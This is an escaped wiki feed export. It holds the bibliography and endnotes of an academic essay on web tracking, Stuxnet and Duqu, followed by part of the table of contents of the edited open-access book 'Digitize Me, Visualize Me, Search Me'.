&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) 'Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;', ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) 'Stuxnet: Computer worm opens new era of warfare', ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) 'Activity Streams', accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) 'JSON Activity Streams 1.0', Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) 'Iran says Stuxnet virus infected 16,000 computers', ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) 'European Watchdog Pushes for Do Not Track Protocol', accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) 'Iran Confirms Stuxnet Worm Halted Centrifuges', ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) 'How Stuxnet Is Rewriting the Cyberterrorism Playbook', ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) 'Stuxnet Myrtus or MyRTUs?', accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) 'A Life Lived in Media', ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) 'Privacy Effects of Web Bugs Amplified by Web 2.0', in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) 'Counting every moment', ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) 'The Web Bug FAQ', accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) 'Duqu Trojan used 'unknown' programming language: Kaspersky', CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) 'How HP bugged e-mail', accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) 'How To Manufacture&amp;amp;nbsp;Desire', ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Frabetti, F. (2010) 'Critical Code Studies', accessed 15/03/2012, http://vimeo.com/16263212 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) 'Dunn grilled by Congress', accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) 'The Lifestreams Software Architecture', Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) 'Welcome to the Yale Lifestreams homepage!', accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) 'Americans Love Google! Americans Hate Google!', ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994) 'The cyber-road not taken.', ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) 'Time To Start Taking The Internet Seriously', ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) 'The Many Data Hats a Company can Wear', accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) 'Ghostrank Planetary System', accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) 'About Ghostery', accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) 'About ChartBeat', accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) 'Stuxnet/Duqu: The Evolution of Drivers', SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) 'A Declaration of Cyber-War', ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hall, G. (2011) ''Digitize Me, Visualize Me, Search Me'', Open Humanities Press, accessed 02/03/2012, http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) 'Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis', ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) ''New Stuxnet' worm targets companies in Europe', ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu '' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) 'Stuxnet opens cracks in Iran nuclear program', accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) 'Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon', accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2012) 'Display Advertising Technology Landscape', accessed 02/06/2012, http://www.lumapartners.com/resource-center/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) 'I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web', ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) 'In a Computer Worm, a Possible Biblical Clue', ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) 'Stuxnet Under the Microscope', accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) 'The Importance of Philosophy to Engineering', ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) 'User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web', Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) 'The Stuxnet Sting', accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Parikka, J. (2012) ''Medianatures: The Materiality of Information Technology and Electronic Waste'', Open Humanities Press, accessed 01/06/2012, http://www.livingbooksaboutlife.org/books/Medianatures &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Parry, D. (2011) ''Ubiquitous Surveillance'', Open Humanities Press, http://www.livingbooksaboutlife.org/books/Ubiquitous_Surveillance &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) 'Langner’s Stuxnet Deep Dive S4 Video', accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) 'Search Engine Use 2012', accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) 'So What Do We Do With All This Data?', _The Smithsonian_, accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sanger, D. E. (2012) Obama Order Sped Up Wave of Cyberattacks Against Iran, The New York Times, June 1, 2012, accessed 02/06/2012, http://www.nytimes.com/2012/06/01/world/middleeast/obama-ordered-wave-of-cyberattacks-against-iran.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) 'Feel. Act. Make sense', accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) 'Bad Habits? My Future Self Will Deal With That', accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wauters, R (2012) '427 million Europeans are now online, 37% uses more than one device: IAB', The Next Web, accessed 01/06/2012, http://thenextweb.com/eu/2012/05/31/427-million-europeans-are-now-online-37-uses-more-than-one-device-iab/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) 'Tracking Protection Working Group', accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) 'The Personal Analytics of My Life', accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) 'CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth', ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) 'Blockbuster Worm Aimed for Infrastructure', But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) 'Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant', ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies and Locally Stored Objects (LSOs) and document object model storage (DOM Storage) &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal, 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: 'Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity' (Ghostery, 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the internal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and the enriching process by careful analysis of the accidental photographing of background images on computers used by the president see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was 03/02/2010 (Matrosov et al., n.d.), although there is suspicion that there may be three versions of the Stuxnet code, revised in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] There are, though, some criticisms that this link may be spurious. For instance, Cryptome (2010) argues that the 'myrtus' string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; may stand for &amp;quot;My-RTUs&amp;quot;, as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post. I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier. I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] 'Computational actants' draws the notion of the actant from actor-network theory. I also like the association with 'companion actants', similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software would be committed to the ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Digitize_Me,_Visualize_Me,_Search_Me&amp;diff=4722</id>
		<title>Digitize Me, Visualize Me, Search Me</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Digitize_Me,_Visualize_Me,_Search_Me&amp;diff=4722"/>
		<updated>2012-05-06T10:31:34Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Image:LifetrackingCover1.jpg|right|318x450px|LifetrackingCover1.jpg]] Open Science and its Discontents &lt;br /&gt;
&lt;br /&gt;
[http://www.livingbooksaboutlife.org/books/ISBN_Numbers ISBN: 978-1-60785-267-4] &lt;br /&gt;
&lt;br /&gt;
''edited by'' [http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me/bio Gary Hall] __TOC__ &lt;br /&gt;
&lt;br /&gt;
== [http://www.livingbooksaboutlife.org/books/Open_science/Introduction '''Introduction: White Noise: On the Limits of Openness (Living Book Mix)''']  ==&lt;br /&gt;
&lt;br /&gt;
One of the aims of the Living Books About Life series is to provide a 'bridge' or point of connection, translation, even interrogation and contestation, between the humanities and the sciences. Accordingly, this introduction to ''Digitize Me, Visualize Me, Search Me'' takes as its starting point the so-called ‘computational turn’ to data-intensive scholarship in the humanities. &lt;br /&gt;
&lt;br /&gt;
The phrase ‘[http://www.thecomputationalturn.com/ the computational turn]’ has been adopted to refer to the process whereby techniques and methodologies drawn from computer science and related fields – including science visualization, interactive information visualization, image processing, network analysis, statistical data analysis, and the management, manipulation and mining of data – are increasingly being used to produce new ways of approaching and understanding texts in the humanities – what is sometimes thought of as 'the digital humanities'. [http://www.livingbooksaboutlife.org/books/Open_science/Introduction (more...)] &lt;br /&gt;
&lt;br /&gt;
== Open Science  ==&lt;br /&gt;
&lt;br /&gt;
=== It’s An Open (Science), Open (Access), Open (Source), Open (Notebook) World  ===&lt;br /&gt;
&lt;br /&gt;
;[http://usefulchem.wikispaces.com/ Open Notebook Science ]&lt;br /&gt;
&lt;br /&gt;
;Patrick O. Brown, Michael B. Eisen, Harold Varmus&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosbiology.org/article/info%3Adoi%2F10.1371%2Fjournal.pbio.0000036 Why PLoS Became a Publisher]&lt;br /&gt;
&lt;br /&gt;
;Sally Murray, Stephen Choi, John Hoey, Claire Kendall, James Maskalyk, and Anita Palepu&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3091592/pdf/OpenMed-02-e1.pdf??tool=pmcentrez Open Science, Open Access and Open Source Software at ''Open Medicine'']&lt;br /&gt;
&lt;br /&gt;
=== Community Science  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=12873908}} &lt;br /&gt;
&lt;br /&gt;
;[http://www.psfk.com/2010/09/biocurious-a-community-lab-for-biotechnology.html BioCurious: A Community Lab for Biotechnology]&lt;br /&gt;
&lt;br /&gt;
;Richard Stallman&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosmedicine.org/article/info%3Adoi%2F10.1371%2Fjournal.pmed.0020047 Free Community Science and the Free Development of Science]&lt;br /&gt;
&lt;br /&gt;
=== 'This Revolution Will Be Digitized’: Online Tools for Open Science  ===&lt;br /&gt;
&lt;br /&gt;
;[http://biogang.openwetware.org/ Biogang]&lt;br /&gt;
&lt;br /&gt;
;Bill Hooker&amp;amp;nbsp; &lt;br /&gt;
:[http://3quarksdaily.blogs.com/3quarksdaily/2007/01/the_future_of_s.html The Future of Science is Open, Part 3: An Open Science World]&lt;br /&gt;
&lt;br /&gt;
;Chris Patil and Vivian Siegel&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC2675795/ This Revolution Will Be Digitized: Online Tools for Radical Collaboration]&lt;br /&gt;
&lt;br /&gt;
=== Open Science Publishing  ===&lt;br /&gt;
&lt;br /&gt;
;Philip E. Bourne&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC2877727/?tool=pmcentrez#pcbi.1000787-Hey1 What Do I Want from the Publisher of the Future?]&lt;br /&gt;
&lt;br /&gt;
;Cameron Neylon&amp;amp;nbsp; &lt;br /&gt;
:[http://pirsa.org/08090038/ Science in the Open/or/How I Learned to Stop Worrying and Love My Blog]&lt;br /&gt;
&lt;br /&gt;
== Open Knowledge  ==&lt;br /&gt;
&lt;br /&gt;
=== Access to Knowledge  ===&lt;br /&gt;
&lt;br /&gt;
;[http://okfn.org/ Open Knowledge Foundation]&lt;br /&gt;
&lt;br /&gt;
;Gaelle Krikorian and Amy Kapczynski, eds&amp;amp;nbsp; &lt;br /&gt;
:[http://www.soros.org/initiatives/information/focus/access/articles_publications/publications/age-of-intellectual-property-20101110/age-of-intellectual-property-20101110.pdf ''Access to Knowledge In the Age of Intellectual Property'']&lt;br /&gt;
&lt;br /&gt;
=== New Models for Open Sharing and Open Research  ===&lt;br /&gt;
&lt;br /&gt;
;Anne H. Margulies&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosbiology.org/article/info%3Adoi%2F10.1371%2Fjournal.pbio.0020200 A New Model for Open Sharing]&lt;br /&gt;
&lt;br /&gt;
;Thomas B. Kepler, Marc A. Marti-Renom, Stephen M. Maurer, Arti K. Rai, Ginger Taylor, Matthew H. Todd&amp;amp;nbsp; &lt;br /&gt;
:[http://www.publish.csiro.au/nid/51/paper/CH06095.htm Open Source Research - The Power of Us]&lt;br /&gt;
&lt;br /&gt;
=== Open Knowledge and its Discontents  ===&lt;br /&gt;
&lt;br /&gt;
;J.J. King&amp;amp;nbsp; &lt;br /&gt;
:[http://www.metamute.org/proudtobeflesh The Packet Gang: Openness and its Discontents]&lt;br /&gt;
&lt;br /&gt;
;Michael Gurstein&amp;amp;nbsp; &lt;br /&gt;
:[http://gurstein.wordpress.com/2011/07/03/are-the-open-data-warriors-fighting-for-robin-hood-or-the-sheriff-some-reflections-on-okcon-2011-and-the-emerging-data-divide/ Are the Open Data Warriors Fighting for Robin Hood or the Sheriff?: Some Reflections on OKCon 2011 and the Emerging Data Divide]&lt;br /&gt;
&lt;br /&gt;
== Open Data  ==&lt;br /&gt;
&lt;br /&gt;
=== Data-Intensive Science  ===&lt;br /&gt;
&lt;br /&gt;
;Vincent S. Smith&amp;amp;nbsp; &lt;br /&gt;
:[http://www.biomedcentral.com/1756-0500/2/113 Data Publication: Towards a Database of Everything]&lt;br /&gt;
&lt;br /&gt;
;Tony Hey, Stewart Tansley, Kristen Tolle, eds&amp;amp;nbsp; &lt;br /&gt;
:[http://research.microsoft.com/en-us/collaboration/fourthparadigm/4th_paradigm_book_part4_complete.pdf Scholarly Communication, ''The Fourth Paradigm: Data-Intensive Scientific Discovery'']&lt;br /&gt;
&lt;br /&gt;
=== World of Data  ===&lt;br /&gt;
&lt;br /&gt;
;[http://www.freeourdata.org.uk/ Free Our Data]&lt;br /&gt;
&lt;br /&gt;
;Simon Rogers&amp;amp;nbsp; &lt;br /&gt;
:[http://www.guardian.co.uk/news/datablog/2010/nov/09/canada-open-data How Canada Became an Open Data and Data Journalism Powerhouse]&lt;br /&gt;
&lt;br /&gt;
=== We Can Know It For You  ===&lt;br /&gt;
&lt;br /&gt;
;Omer Tene&amp;amp;nbsp; &lt;br /&gt;
:[http://epubs.utah.edu/index.php/ulr/article/viewArticle/136 What Google Knows: Privacy and Internet Search Engines]&lt;br /&gt;
&lt;br /&gt;
;Daniel Chandramohan, Kenji Shibuya, Philip Setel, Sandy Cairncross, Alan D. Lopez, Christopher J. L. Murray, Basia Żaba, Robert W. Snow, Fred Binka&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosmedicine.org/article/info%3Adoi%2F10.1371%2Fjournal.pmed.0050057 Should Data from Demographic Surveillance Systems Be Made More Widely Available to Researchers?]&lt;br /&gt;
&lt;br /&gt;
== '''Digitize Me'''  ==&lt;br /&gt;
&lt;br /&gt;
=== Encode Me/Decode Me  ===&lt;br /&gt;
&lt;br /&gt;
;[http://www.ornl.gov/sci/techresources/Human_Genome/home.shtml Human Genome Project]&lt;br /&gt;
&lt;br /&gt;
;The ENCODE Project Consortium&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/picrender.cgi?accid=PMC3079585&amp;amp;blobtype=pdf&amp;amp;tool=pmcentrez A User's Guide to the Encyclopaedia of DNA Elements (ENCODE) ]&lt;br /&gt;
&lt;br /&gt;
;[http://www.decodeme.com/about-decodeme deCODEme]&lt;br /&gt;
&lt;br /&gt;
=== Life-Tracking  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=27381297}} &lt;br /&gt;
&lt;br /&gt;
